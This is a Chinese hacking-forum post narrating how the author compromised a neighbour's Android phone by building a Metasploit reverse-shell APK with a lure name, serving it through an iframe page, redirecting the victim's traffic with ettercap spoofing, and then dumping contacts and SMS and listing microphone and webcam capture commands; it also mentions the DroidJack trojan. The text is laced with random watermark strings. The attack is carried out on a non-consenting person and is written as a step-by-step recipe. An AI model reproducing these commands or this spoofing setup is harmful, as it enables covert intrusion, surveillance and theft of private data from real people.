找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 metasploit+ettercap中间人攻击成功入侵邻居手机
返回列表 发新帖
查看: 2103|回复: 0
打印 上一主题 下一主题

metasploit+ettercap中间人攻击成功入侵邻居手机

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2018-10-20 20:30:37 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

1 H) Y8 y. @1 g6 |5 F 五、msf+ettercap入侵邻居安卓手机 : n8 j- d% M2 e/ Q

9 Y6 Q' R# C( N

/ X& o4 p& w$ b/ a' w4 s& X$ j 首先启动msf 7 z. k4 `: R. y! u0 J0 t: V

/ g! r" h0 H* E- c

! B. R& m2 P2 z5 H) N 先用kali生成一个安卓木马,如下命令: / L. Y. y/ e! g" |6 q) q

' a$ G/ \0 b: q* l, @$ V

, H/ x0 s* i! K( P7 ~' I# e Msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.109 LPORT=44444 -o ~/Desktop/ribenav.apk + o" Y# ~% ]6 _" T8 j" T& }* Y

. k6 d( R s, ?" s# j# Q

# S+ [$ o4 t! G0 z. d; c7 e 为了能让对方下载以后安装我这里将马的名字命名为ribenav.apk,哈哈邻居可是个“大色鬼”,就不适用替换下载的方法了,据我所知,邻居频繁使用手机浏览器浏览新闻 9 S6 Q/ b9 O: b2 Q8 }

! D( J, \' J6 P1 ?% F( [

+ m. w( [# G6 w L 然后进入msf 9 ?9 N- x( ~7 w; Z8 X

% H. K: C: Q0 _0 H0 B

0 V; e! F3 d) ], _- ]0 e use exploit/multi/handler 0 t* o! c5 G: k' m3 ?* a& F/ m9 s

- X/ U# c+ { \2 g+ U$ x; h

" I, E4 Z t2 Y3 J" {0 e set payload android/meterpreter/reverse_tcp - P# Y+ O/ \( ]6 T& X) t7 p

+ B8 ]5 T. n, j$ A# Z8 N2 `1 H

8 g7 x; K; h. K. v$ ] set LHOST 192.168.0.109 //ipkailiip # K4 T& R* c5 ?, _/ F9 x

' y6 {) Y1 N( s: w

$ M4 A8 \8 c: U1 s) r) C set LPORT 44444 //端口一定要与前面生成的木马的端口一致 5 X/ B- ?6 A8 H7 R; Z- [1 |

9 y6 K" u+ x, w

9 U0 l y3 x/ w" l$ m6 X0 K. Q Exploit % j1 H% X! ?7 C; J5 t5 H% M( P4 P+ \7 j. z% [

$ z8 c, t; B2 |3 X3 a

3 p: i% Z/ A4 _5 e( g# F# w   / m; }8 }5 E) M

+ H' ^3 q- z* g* H

8 o5 J! u4 V7 o 下面我们开启ettercap -G ! j) |6 ^! v+ H! b/ `2 N+ E

9 \5 q% x- X: d+ \

5 |& k6 B8 t1 Y* e" H9 a 我物理IP : s% h; `' X, J& J: |

" m4 m- \/ J3 y1 a* D

4 N$ ?' Y$ o; Z2 Y   - x" t. h1 ^% Z; _ G1 |

2 f A. \ ~5 E. S, H& h: x

$ B% O& w2 [ q' x- y- d0 P 别到时候再把我物理机欺骗了,之前测试物理机只装腾讯管家是可以成功欺骗的, % m! F1 _9 E/ _" q( D9 b4 b# L

' \. U3 G; w& E V# H, T `

2 W5 M: K% U6 O' B/ z6 \ 下面我们来设置一下 * W5 J4 X2 {4 a& ]

$ I+ D7 h) L& X

' G- s9 T3 J& p% P8 s9 q1 m* H% w# T   & Y" `5 O" C$ @$ Z0 W

- p9 j0 f1 g' R( Z

9 P, E" V/ [$ s/ _ 在开启欺骗之前我们先把生成的apk马丢到kaili var/www/html下,并创建一个index.htm文件内容为:<iframe src=http://192.168.0.109/ribenav.apk></iframe>,因为apk文件嘛要想直接提示下载,用iframe语句就OK了, . ?, R+ @; `. M, c6 m

( T0 l! w+ \5 `1 c% u" L8 F8 G

" }2 ~: J7 O" ]% J; p   5 o; h' P; m6 K& J' s/ {

" t7 i. x3 P! z/ p

2 b& p, N- f2 c7 T9 i' R   0 A$ ?) ~, q. t5 \

# w9 ]# j' J: @4 ^, @4 P7 ^

! O2 O T! [; `; j   8 P4 @' j" c5 P: ^6 @1 N) `

$ G: Y( }/ y3 @# ~

( }7 P q5 z9 l- q: a, u' b   ; Z( N3 p: Z- _, V% _: a! Z! N

; c# G1 |" G/ Z

, b6 V0 B+ a7 V- a7 ^   ! ?# z! F6 n0 C! G$ t

5 D0 f4 {3 K4 z) T3 P

2 Z: Q& s& H; g, l7 x/ w   ' ?" y V2 x) Y* t- ~' E

; ?0 O5 P* G; w. R2 x$ l

5 O, ?5 X& `( i2 ]9 j0 s) X) X5 e* P8 x   ) K1 o& O. u+ q$ t! g

6 B: `1 H5 k2 Q& [7 H

+ J6 y! ], |! M; C   ' x4 C' v' P. C- }6 Z

% T* ^+ q5 r/ g

/ P% k4 M/ x3 U5 [8 I1 A   0 l# H5 j+ M, Y: L9 h0 ^% @, S

0 n4 O. m& O+ U2 \6 o% @8 R

% y1 s! _3 R5 i) x4 a- j; `& ^   ( `- Q$ M) m5 V+ \; L

- C# L d0 U1 ^

) O8 i. Z! d3 u; A9 K/ M   : k6 Q& \3 Y1 M( X# r4 G

$ U7 k& L7 g- G

7 ?( B# l& V, G5 t) i   . o2 X, ?* k$ g' h) c% K' |

( e' G& Z2 h7 L" |

+ K7 K1 z- ]+ _   4 V/ X. G- h, |" }

% o+ W6 O7 r6 Q% d

2 w/ w4 E8 s8 | 下面我们开始攻击 & n! {3 B# T. j. P

- t, v4 C" ~3 x

9 C+ f: f$ X$ e8 ^4 `& R( G   0 U ]+ t) n* }" j! t( R7 O

4 o$ H$ H( O- V7 e5 y8 O0 _

) i& n7 t f+ O   ! C+ i3 H$ B8 I, ]& `# k O, {

5 u9 a8 h5 w+ k/ C

- L5 P& o* L8 Q* {/ K2 H( u   5 Z3 \% ]3 _1 T

. L; a0 a0 r: \2 a1 a. F* H

# J0 V7 x: b6 L2 t' m! W) Q) L" W   ( C: V5 X m! u0 |9 i0 n3 q* }

6 R/ ^7 S. Y: [

; b1 V. t+ l8 B) @; K   0 J$ a4 b* F' J% ^- P

5 v" x& y2 W1 F3 @; S* T' F

2 T1 R0 L F1 a/ p% v, V 大概过了5分钟多,发现反弹成功了 5 G; `6 p1 t0 F7 I( u+ A5 z0 u

: C2 @7 D; @2 ^ [; D

9 Z# ? M* H0 ^6 D( V   : r# J5 V! Q' ]2 {/ k

# ^6 r/ H: B! w, R+ h: j1 {. s

( |6 I. f4 J/ e" R; V; z. ?   ; F, P3 Q5 {+ j# _# v. E, I* h( p

; f/ L2 n3 x: m

1 e& G. M7 N0 M* Z   4 O7 r0 x. t& u% ]

* [9 k4 p& ^0 i

7 A: x2 n. \2 b z' i1 U. c   , p. z9 A& N, R3 v* @* e; ]7 g$ D$ i

" f" C: }8 E" A# E# T* ^# A! S

, Y. n0 o2 E. t, }3 N' X4 m   - J7 u' D9 n4 l+ G& {" ]

. d; u- p6 z/ w$ L" ~

/ j9 ]5 V* q6 @: ^# b   - ~, W+ W9 |" j3 @

* h9 M/ u" x0 \2 q0 t/ G5 V8 ^

2 |' R' Z* `1 y/ O: Z' L8 H, O   & [, t: Z* }6 e+ d; L6 ~, ]) m5 E

9 M/ W I6 r: d& C% j

0 o6 C) l& P2 A d 执行命令 " K$ X6 n1 ?" T

* \% u4 |! \; \/ x/ j: i

& t# A; W% Y9 \9 Z2 _, \   2 A/ Z6 ~' q! w/ X# y

4 j8 s. U, G3 c$ d" V! q* h. ~

8 H. l1 |8 O& S3 j dump_contacts    --》这个是导出电话 6 p7 j; M" b H* \

' Q( l7 v0 S( j. N* y; \6 v- B7 z# F

$ I' b# H% P1 X r1 |+ u dump_sms --》这个是导出信息 3 }' g8 W6 n6 y& M# h

1 s9 l- k! d/ y% l

6 A5 J$ ~3 X7 g( G& b3 Q: K7 H record_mic     Record audio from the default microphone for X seconds " q1 J k: k' g* }2 x3 n

4 t( {3 v, }# U

1 x- X% @ v, z( Q1 o     webcam_chat    Start a video chat & _/ f) m3 N. v, o% N" |/ Z

) u$ J0 R5 e0 ^4 S9 R

i" @4 p+ l4 F     webcam_list    List webcams 8 x2 C" u7 V' c

$ J- [# f% E A1 L8 `

; o% O% ?( e/ u8 W# {     webcam_snap    Take a snapshot from the specified webcam 9 z7 C" n8 m. Q" A, P8 ^

- O0 r' n, o1 ~7 V( e- Q# ~

5 W- A3 y2 b0 [4 O! p a* j6 L( g webcam_stream  lay a video stream from the specified webcam ) r! n" {4 e6 v/ [: Y# J

1 J p* i( ~: o7 V

6 x2 B- ?: r* N   5 Q& B2 y% u! ?6 @5 L; |* g8 w

$ f; E& k9 H1 n! b8 ?

( V2 X/ R, U) D! \. \0 m, N- N/ B   $ K; h( r# N8 h6 J

0 E7 s- D: ?0 w( A, g# }2 E9 m

0 q& `) ?9 a4 }# W* y 我们打开看一下电话薄, 4 ^9 }5 s: U& C0 [

" Q: V7 n/ J, k& R( T' J% C

6 k' N8 W+ ~6 I$ i+ Q- ]# h3 C   6 y3 c! v( q7 S

- ~7 \! X% a5 q2 ]: M+ {

3 O1 E& O/ X) ?, ~8 c0 E' X* q4 @   ' O3 b* `$ N- ~! `* l8 m( T+ ?$ Q' O+ H

# j- T$ p# o9 |2 i9 [3 i& m5 `

% m+ T- ]/ U3 {2 ~! O   ) p7 R6 r/ s; b* J/ M

+ P# O6 a' z4 Z; r+ k- F) b

& M0 f! R, t1 w" Q# f   $ b N" W( p/ R* N/ p) \# V/ t. ~

4 X5 H) H" \. U8 Z% H* i" K

3 |6 }! @! B5 L: b2 b   7 r. h( D$ V8 @ `6 J

* x1 w( C$ c8 ~% l$ |

- R( r a6 i ^4 T \ c; _% M   3 X) b% F9 a3 r. H3 t

+ G q+ I1 c% D. g0 I4 ^% x* v, @

) N5 O) a4 y0 ]- ~ 我们同时欺骗成DroidJack木马,使用方法如图: : S" r( H9 ~) T6 q0 ^5 R

/ B4 J$ f9 `+ `. A6 {4 W

+ _4 Z) \2 U2 N( z1 z- s+ }   , P: X; m, J+ x* k: d

* L6 A& A# ?* {# d: F/ B

2 d6 |) P2 }: X- I5 h+ M   : i0 {+ N9 {) _' s8 l$ h% f% x

; V/ n, m, k! t2 p: r& x

" Z4 l# u# \: K) \" j0 h   + R! W4 C2 N# K, p

& U M" |. \3 d6 ^0 y9 {

D8 y; W$ c* h! u S$ m2 U 切记在前面生成完马以后记得在这里选择开关为on,并且对应前面生成马的时候的端口 ! ] y0 P( s. Q

0 a& |: s/ _5 P1 I

" d6 I% c( }( I2 y   1 l2 {- n5 B3 }4 F: B; [9 V4 _* [

O/ H0 B6 G/ G! u5 t

y6 h2 \/ [) ?' i   3 C" h- C# I1 d2 A: X

( j. L5 E" B3 R9 d; X1 k* v

2 M2 s" U+ o2 f# N& R   1 D3 D/ u7 q8 K# y' d* c) I

- x- a4 c6 f2 ?- r$ R

2 k) b4 B. u4 B( H* ` 6 J2 Q) z1 ~ [# b9 A2 V0 [2 Z

, Z( g: ~ O- c1 H# c

: D8 \7 u8 H+ T( \6 ?
: I V) e7 c7 h1 a# Z. ? L7 f8 z

回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表